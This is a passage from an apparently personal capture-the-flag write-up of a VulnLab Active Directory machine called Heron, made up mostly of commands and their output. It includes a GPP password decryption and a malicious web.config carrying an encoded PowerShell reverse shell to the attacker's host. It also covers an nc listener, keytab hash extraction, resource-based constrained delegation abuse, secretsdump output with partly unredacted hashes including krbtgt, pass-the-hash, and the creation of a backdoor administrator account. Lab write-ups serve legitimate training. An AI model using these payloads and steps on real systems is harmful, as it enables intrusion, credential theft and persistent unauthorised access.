Time.Started.....: Fri Aug  2 15:06:30 2024 (0 secs)
Time.Estimated...: Fri Aug  2 15:06:30 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)

Started: Fri Aug  2 15:06:29 2024
Stopped: Fri Aug  2 15:06:32 2024

With the pass found, we do a bloodhound enum

┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains4 bloodhound-python -d 'heron.vl' -u 'samuel.davies' -p 'l6<redacted>oN' -c all -ns 10.10.148.85 --zip 
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
INFO: Found AD domain: heron.vl
INFO: Getting TGT for user
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:88  ...  OK
INFO: Connecting to LDAP server: mucdc.heron.vl
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:88  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:389  ...  OK
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 5 computers
INFO: Connecting to LDAP server: mucdc.heron.vl
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:88  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:389  ...  OK
INFO: Found 28 users
INFO: Found 59 groups
INFO: Found 5 gpos
INFO: Found 4 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: frajmp.heron.vl
INFO: Querying computer: 
INFO: Querying computer: 
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.86:445 INFO: Querying computer: 
INFO: Querying computer: mucdc.heron.vl
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:445 <--socket error or timeout!
 ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:88  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:445  ...  OK
INFO: Done in 00M 07S
INFO: Compressing output into 20240802151131_bloodhound.zip

Getting more users with ldapdump

┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains4 ldapsearch -x -LLL -H ldap://mucdc.heron.vl -D 'samuel.davies@heron.vl' -b 'DC=heron,DC=vl' -w 'l6<redacted>oN' | grep userPrincipalName | awk '{print $2}' | cut -d '@' -f 1 > allusers.txt 
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:389  ...  OK

SMB enum

┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains4 smbclient -L 10.10.148.85 -U 'samuel.davies'   
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:445  ...  OK
Password for [WORKGROUP\samuel.davies]:

    Sharename       Type      Comment
    ---------       ----      -------
    accounting$     Disk      
    ADMIN$          Disk      Remote Admin
    C$              Disk      Default share
    CertEnroll      Disk      Active Directory Certificate Services share
    home$           Disk      
    IPC$            IPC       Remote IPC
    it$             Disk      
    NETLOGON        Disk      Logon server share 
    SYSVOL          Disk      Logon server share 
    transfer$       Disk      
Reconnecting with SMB1 for workgroup listing.
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:139  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:139  ...  OK
do_connect: Connection to 10.10.148.85 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

Connect to smb we find group.xml with a pasword in it

┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains4 smbclient \\\\10.10.148.85\\SYSVOL -U 'samuel.davies'   
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Password for [WORKGROUP\samuel.davies]:
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:445  ...  OK
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sun May 26 11:37:40 2024
  ..                                  D        0  Sun May 26 11:37:40 2024
  heron.vl                           Dr        0  Sun May 26 11:37:40 2024

        6261499 blocks of size 4096. 1958913 blocks available
smb: \> cd heron.vl
smb: \heron.vl\> ls
  .                                   D        0  Sun May 26 11:38:59 2024
  ..                                  D        0  Sun May 26 11:37:40 2024
  DfsrPrivate                      DHSr        0  Sun May 26 11:38:59 2024
  Policies                            D        0  Tue Jun  4 17:57:41 2024
  scripts                             D        0  Sun Jun  2 12:42:56 2024

        6261499 blocks of size 4096. 1958913 blocks available
smb: \heron.vl\> cd Policies
smb: \heron.vl\Policies\> ls
  .                                   D        0  Tue Jun  4 17:57:41 2024
  ..                                  D        0  Sun May 26 11:38:59 2024
  {31B2F340-016D-11D2-945F-00C04FB984F9}      D        0  Sun May 26 11:37:44 2024
  {3FFDA928-A6D1-4860-936F-25D9D2D7EAEF}      D        0  Sun May 26 12:21:54 2024
  {6AC1786C-016F-11D2-945F-00C04fB984F9}      D        0  Sun May 26 11:37:44 2024
  {6CC75E8D-586E-4B13-BF80-B91BEF1F221C}      D        0  Tue Jun  4 17:57:41 2024
  {866ECED1-24B0-46EF-92F5-652345A1820C}      D        0  Sun May 26 12:23:29 2024

        6261499 blocks of size 4096. 1958912 blocks available
smb: \heron.vl\Policies\> cd {6CC75E8D-586E-4B13-BF80-B91BEF1F221C}
smb: \heron.vl\Policies\{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}\> ls
  .                                   D        0  Tue Jun  4 17:57:41 2024
  ..                                  D        0  Tue Jun  4 17:57:41 2024
  GPT.INI                             A       59  Tue Jun  4 18:00:13 2024
  Machine                             D        0  Tue Jun  4 17:59:44 2024
  User                                D        0  Tue Jun  4 17:57:41 2024

        6261499 blocks of size 4096. 1958910 blocks available
smb: \heron.vl\Policies\{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}\> cd Machine
smb: \heron.vl\Policies\{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}\Machine\> ls
  .                                   D        0  Tue Jun  4 17:59:44 2024
  ..                                  D        0  Tue Jun  4 17:57:41 2024
  Preferences                         D        0  Tue Jun  4 17:59:44 2024

        6261499 blocks of size 4096. 1958908 blocks available
smb: \heron.vl\Policies\{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}\Machine\> cd Preferences
smb: \heron.vl\Policies\{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}\Machine\Preferences\> ls
  .                                   D        0  Tue Jun  4 17:59:44 2024
  ..                                  D        0  Tue Jun  4 17:59:44 2024
  Groups                              D        0  Tue Jun  4 17:59:44 2024

        6261499 blocks of size 4096. 1958908 blocks available
smb: \heron.vl\Policies\{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}\Machine\Preferences\> cd Groups
smb: \heron.vl\Policies\{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}\Machine\Preferences\Groups\> ls
  .                                   D        0  Tue Jun  4 17:59:44 2024
  ..                                  D        0  Tue Jun  4 17:59:44 2024
  Groups.xml                          A     1135  Tue Jun  4 18:01:07 2024

        6261499 blocks of size 4096. 1958908 blocks available
smb: \heron.vl\Policies\{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}\Machine\Preferences\Groups\> get Groups.xml
getting file \heron.vl\Policies\{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}\Machine\Preferences\Groups\Groups.xml of size 1135 as Groups.xml (13.2 KiloBytes/sec) (average 13.2 KiloBytes/sec)
smb: \heron.vl\Policies\{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}\Machine\Preferences\Groups\> 

Gppencrypt pw [

pip3 install pycryptodome colorama
puck@edge-meppel:~/gpp-decrypt$ python3 gpp-decrypt.py 

                               __                                __ 
  ___ _   ___    ___  ____ ___/ / ___  ____  ____  __ __   ___  / /_
 / _ `/  / _ \  / _ \/___// _  / / -_)/ __/ / __/ / // /  / _ \/ __/
 \_, /  / .__/ / .__/     \_,_/  \__/ \__/ /_/    \_, /  / .__/\__/ 
/___/  /_/    /_/                                /___/  /_/         

usage: python3 gpp-decrypt.py -f [groups.xml]
gpp-decrypt.py: error: one of the arguments -f/--file -c/--cpassword is required
puck@edge-meppel:~/gpp-decrypt$ python3 gpp-decrypt.py -c 1G19pP9gbIPUr5xLeKhEUg==

                               __                                __ 
  ___ _   ___    ___  ____ ___/ / ___  ____  ____  __ __   ___  / /_
 / _ `/  / _ \  / _ \/___// _  / / -_)/ __/ / __/ / // /  / _ \/ __/
 \_, /  / .__/ / .__/     \_,_/  \__/ \__/ /_/    \_, /  / .__/\__/ 
/___/  /_/    /_/                                /___/  /_/         

[ * ] Password: H3<redacted>#!
puck@edge-meppel:~/gpp-decrypt$

with the H3<redacted>#! pass , valid for user svc-web-accounting-d , we can access SMB

┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains4 smbclient \\\\10.10.148.85\\accounting$ -U 'svc-web-accounting-d'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Password for [WORKGROUP\svc-web-accounting-d]:H3r<redacted>#!
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:445  ...  OK
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Jun  7 08:14:04 2024
  ..                                DHS        0  Sun Jun  2 17:26:14 2024
  AccountingApp.deps.json             A    37407  Sun Jun  2 21:25:26 2024
  AccountingApp.dll                   A    89600  Sun Jun  2 21:25:26 2024
  AccountingApp.exe                   A   140800  Sun Jun  2 21:25:26 2024
  AccountingApp.pdb                   A    39488  Sun Jun  2 21:25:26 2024
  AccountingApp.runtimeconfig.json      A      557  Sun Jun  2 00:22:20 2024
  appsettings.Development.json        A      127  Sun Jun  2 00:00:54 2024
  appsettings.json                    A      237  Sun Jun  2 00:03:50 2024
  FinanceApp.db                       A   106496  Sat Jun  1 16:09:00 2024
  Microsoft.AspNetCore.Authentication.Negotiate.dll      A    53920  Wed Nov  1 10:08:26 2023
  Microsoft.AspNetCore.Cryptography.Internal.dll      A    52912  Mon May 20 14:23:52 2024
  Microsoft.AspNetCore.Cryptography.KeyDerivation.dll      A    23712  Mon May 20 14:23:56 2024
  Microsoft.AspNetCore.Identity.EntityFrameworkCore.dll      A   108808  Mon May 20 14:24:24 2024
  Microsoft.Data.Sqlite.dll           A   172992  Mon May 20 09:54:40 2024
  Microsoft.EntityFrameworkCore.Abstractions.dll      A    34848  Mon May 20 09:54:30 2024
  Microsoft.EntityFrameworkCore.dll      A  2533312  Mon May 20 09:55:04 2024
  Microsoft.EntityFrameworkCore.Relational.dll      A  1991616  Mon May 20 09:55:20 2024
  Microsoft.EntityFrameworkCore.Sqlite.dll      A   257456  Mon May 20 09:55:30 2024
  Microsoft.Extensions.DependencyModel.dll      A    79624  Tue Oct 31 23:59:24 2023
  Microsoft.Extensions.Identity.Core.dll      A   177840  Mon May 20 14:24:10 2024
  Microsoft.Extensions.Identity.Stores.dll      A    45232  Mon May 20 14:24:20 2024
  Microsoft.Extensions.Options.dll      A    64776  Thu Jan 18 12:05:26 2024
  runtimes                            D        0  Sat Jun  1 16:51:32 2024
  SQLitePCLRaw.batteries_v2.dll       A     5120  Thu Aug 24 04:41:24 2023
  SQLitePCLRaw.core.dll               A    50688  Thu Aug 24 04:38:38 2023
  SQLitePCLRaw.provider.e_sqlite3.dll      A    35840  Thu Aug 24 04:38:52 2023
  System.DirectoryServices.Protocols.dll      A    71944  Wed Nov  1 00:00:24 2023
  web.config                          A      554  Thu Jun  6 16:41:39 2024
  wwwroot                             D        0  Sat Jun  1 16:51:32 2024

        6261499 blocks of size 4096. 1957663 blocks available
smb: \> 

.

We remove web.config, and then upload a modified web.config

i used this one

<?xml version="1.0" encoding="utf-8"?>
<configuration>
<location path="." inheritInChildApplications="false">
    <system.webServer>
    <handlers>
        <add name="aspNetCore" path="execute.now" verb="*" modules="AspNetCoreModuleV2" resourceType="Unspecified" />
    </handlers>
    <aspNetCore processPath="powershell" arguments="-e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AOAAuADIALgAxADMAOAAiACwAOQAwADAAMQApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=" hostingModel="OutOfProcess" />
    </system.webServer>
</location>
</configuration>
<!--ProjectGuid: 803424B4-7DFD-4F1E-89C7-4AAC782C27C4-->

Then i did a proxychains Firefox to http://accounting.heron.vl

logged in as svc-web-accounting-d with the H3<redacted>#!  pasword, and then visited http://accounting.heron.vl/execute.now to trigger

or do a curl like this

┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains curl -u:svc-web-accounting:H3<redacted>#! http://accounting.heron.vl/execute.now
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  accounting.heron.vl:80  ...  OK

 

and catched the rev shell back to my kali box

┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ nc -nlvp 9001                
listening on [any] 9001 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.177.37] 58560

PS C:\webaccounting> cd c:\windows\scripts
PS C:\windows\scripts> dir


    Directory: C:\windows\scripts


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
-a----          6/6/2024   7:12 AM           1416 dns.ps1                                                              
-a----          6/1/2024   8:26 AM            221 ssh.ps1                                                              


PS C:\windows\scripts> type ssh.ps1
$plinkPath = "C:\Program Files\PuTTY\plink.exe"
$targetMachine = "frajmp"
$user = "_local"
$password = "De<redacted>lt"
& "$plinkPath" -ssh -batch $user@$targetMachine -pw $password "ps auxf; ls -lah /home; exit"
PS C:\windows\scripts>                      

checked Defender is running Get-MpComputerStatus on MUCDC, killing session after about 1 min, so visited http://accounting.heron.vl/execute.now again if ya need more time…

privesc on ubuntu box

pentest@frajmp:/tmp$ su _local
Password: 
_local@frajmp:/tmp$ sudo -l
[sudo] password for _local: 
Matching Defaults entries for _local on localhost:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User _local may run the following commands on localhost:
    (ALL : ALL) ALL
_local@frajmp:/tmp$ sudo su
root@frajmp:/tmp# cd /root
root@frajmp:~# ls
flag.txt  snap
root@frajmp:~# cat flag.txt
VL{51<redacted>60}

transfer /etc/krb5.keytab with nc to kali box, and do a keytabextract.py

──(puck㉿kali)-[~/vulnlab/heron]
└─$ python3 keytabextract.py krb5.keytab           
[*] RC4-HMAC Encryption detected. Will attempt to extract NTLM hash.
[*] AES256-CTS-HMAC-SHA1 key found. Will attempt hash extraction.
[*] AES128-CTS-HMAC-SHA1 hash discovered. Will attempt hash extraction.
[+] Keytab File successfully imported.
    REALM : HERON.VL
    SERVICE PRINCIPAL : FRAJMP$/
    NTLM HASH : 6f<redacted>f7
    AES-256 HASH : 7be44e62e24ba5f4a5024c185ade0cd3056b600bb9c69f11da3050dd586130e7
    AES-128 HASH : dcaaea0cdc4475eee9bf78e6a6cbd0cd

We do some more Enumeration …finding Depl<redacted>Dealt working for julian.pratt

┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains4 smbclient \\\\10.10.134.197\\home$ -U 'julian.pratt'     
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Password for [WORKGROUP\julian.pratt]: Depl<redacted>Dealt
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.134.197:445  ...  OK
Try "help" to get a list of possible commands.
smb: \>
smb: \> cd Julian.Pratt
smb: \Julian.Pratt\> dir
  .                                   D        0  Sun Jun  2 12:47:14 2024
  ..                                  D        0  Sat Jun  1 17:10:46 2024
  frajmp.lnk                          A     1443  Sun Jun  2 12:47:47 2024
  Is there a way to -auto login- in PuTTY with a password- - Super User.url      A      117  Sat Jun  1 17:44:44 2024
  Microsoft Edge.lnk                  A     2312  Sat Jun  1 17:44:38 2024
  mucjmp.lnk                          A     1441  Sun Jun  2 12:47:33 2024

        6261499 blocks of size 4096. 1985339 blocks available
smb: \Julian.Pratt\> mget *.lnk
Get file frajmp.lnk? y
getting file \Julian.Pratt\frajmp.lnk of size 1443 as frajmp.lnk (17.2 KiloBytes/sec) (average 17.2 KiloBytes/sec)
Get file Microsoft Edge.lnk? y
getting file \Julian.Pratt\Microsoft Edge.lnk of size 2312 as Microsoft Edge.lnk (26.9 KiloBytes/sec) (average 22.1 KiloBytes/sec)
Get file mucjmp.lnk? y
getting file \Julian.Pratt\mucjmp.lnk of size 1441 as mucjmp.lnk (17.8 KiloBytes/sec) (average 20.7 KiloBytes/sec)
smb: \Julian.Pratt\> 

.

From bloodhoud, We find adm_prju is within the ADMINS_T1 group, they have the WriteAccountRestrictions privilege over MUCDC.

Having WriteAccountRestrictions means that adm_prju has write access to all of the attributes on the machine, notably msDS-AllowedToActOnBehalfOfOtherIdentity. If we have the ability to modify this attribute,  we can abuse resource-based constrained delegation

Next do the RBCD ( Role Based Constrained Delegation )

┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains impacket-rbcd -delegate-from 'FRAJMP$' -delegate-to 'MUCDC$' -dc-ip 10.10.165.85 -action 'write' 'heron.vl/adm_prju:ay<redacted>B4' 
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.165.85:389  ...  OK
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] FRAJMP$ can now impersonate users on MUCDC$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*]     FRAJMP$      (S-1-5-21-1568358163-2901064146-3316491674-27101)

Get the ticket

┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains impacket-getST -spn 'cifs/mucdc.heron.vl' -impersonate '_admin' 'heron.vl/FRAJMP$' -hashes :6f<redacted>f7
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  HERON.VL:88  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  HERON.VL:88  ...  OK
[*] Impersonating _admin
[*] Requesting S4U2self
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  heron.vl:88  ...  OK
[*] Requesting S4U2Proxy
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  heron.vl:88  ...  OK
[*] Saving ticket in _admin@cifs_mucdc.heron.vl@HERON.VL.ccache
                                                                                      
┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ export KRB5CCNAME=_admin@cifs_mucdc.heron.vl@HERON.VL.ccache        

and do a secretsdump

┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains impacket-secretsdump -k mucdc.heron.vl 
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.165.85:445  ...  OK
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x7a8b61a266b3e6ba7b55725d51f2b723
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:36<redacted>4e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
HERON\MUCDC$:plain_password_hex:6ba8a<redacted>3adc3
HERON\MUCDC$:aad3b435b51404eeaad3b435b51404ee:a3623<redacted>94ee:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x76a0d28b7925171e2b82994b58e5991310b49216
dpapi_userkey:0xda9a3255d163e84c6ab4e578f44c544e80285f19
[*] NL$KM 
 0000   5C A7 E2 A0 9A 0F 0E A7  0A 6F 35 33 21 07 83 01   \........o53!...
 0010   93 8A 8A 6D 21 3B C2 CA  60 E6 E6 B6 5A 22 04 A2   ...m!;..`...Z"..
 0020   D1 F4 93 69 36 20 AF BB  F7 38 31 3A BE E5 D5 29   ...i6 ...81:...)
 0030   55 5E 2B 54 ED A4 1B 52  03 FD 77 75 AC F2 9A 58   U^+T...R..wu...X
NL$KM:5ca7e2a09a0f0ea70a6f353321078301938a8a6d213bc2ca60e6e6b65a2204a2d1f493693620afbbf738313abee5d529555e2b54eda41b5203fd7775acf29a58
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.165.85:135  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.165.85:49667  ...  OK
_admin:500:aad3b435b51404eeaad3b435b51404ee:39<redacted>38:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:9c586ab9529b5a6445e501b2208403f2:::
heron.vl\Katherine.Howard:24575:aad3b435b51404eeaad3b435b51404ee:654<redacted>d2:::

Get the  flag’s

┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains4 smbclient \\\\10.10.165.85\\C$ -U '_admin' --pw-nt-hash 39<redacted>38
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.165.85:445  ...  OK
Try "help" to get a list of possible commands.
smb: \> dir
  $Recycle.Bin                      DHS        0  Thu Jun  6 17:01:47 2024
  --snip--
  System Volume Information         DHS        0  Sun May 26 11:48:42 2024
  transfer                            D        0  Sun May 26 13:51:27 2024
  Users                              DR        0  Sat Jun  1 17:43:04 2024
  webaccounting                       D        0  Fri Jun  7 08:14:04 2024
  Windows                             D        0  Sun Jun  2 17:26:03 2024

        6261499 blocks of size 4096. 1962809 blocks available

Beyond root

proxychains xfreerdp /u:_admin /pth:39<redacted>38 /w:1566 /h:968 /v:10.10.134.197:3389
 -> RDP in to MUCDC not allowed


┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains impacket-wmiexec _admin@10.10.134.197 -hashes aad3b435b51404eeaad3b435b51404ee:39<redacted>38
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.134.197:445  ...  OK
[*] SMBv3.0 dialect used
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.134.197:135  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.134.197:49669  ...  OK
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
heron\_admin

C:\>net user /add puck Password123!
The command completed successfully.


C:\>net localgroup Administrators puck /add[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.134.197:135  ...  OK

The command completed successfully.


$ proxychains xfreerdp /u:puck /p:Password123! /w:1566 /h:968 /v:10.10.134.197:3389


---
C:\Users\puck>net user adm_hoka
User name                    adm_hoka
Full Name                    adm_hoka
Comment                      t0
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            5/26/2024 4:50:28 AM
Password expires             Never
Password changeable          5/27/2024 4:50:28 AM
Password required            Yes
User may change password     Yes

Workstations allowed         admjmp_t0
Logon script                 \\heron.vl\SYSVOL\heron.vl\scripts\logon.vbs
User profile
Home directory               \\mucdc.heron.vl\home$\adm_hoka
Last logon                   Never

Logon hours allowed          All

Local Group Memberships
Global Group memberships     *Domain Users         *admins_t0
The command completed successfully.

---
logon.vbs contains
Option Explicit

Dim objShell, bgInfoPath, bgInfoConfigPath

Set objShell = CreateObject("WScript.Shell")
bgInfoPath = "\\heron.vl\SYSVOL\heron.vl\scripts\Bginfo64.exe"
bgInfoConfigPath = "\\heron.vl\SYSVOL\heron.vl\scripts\bginfo.bgi"
objShell.Run """" & bgInfoPath & """ """ & bgInfoConfigPath & """ /timer:0", 0, True
Set objShell = Nothing


 

This chain was really fun 🙂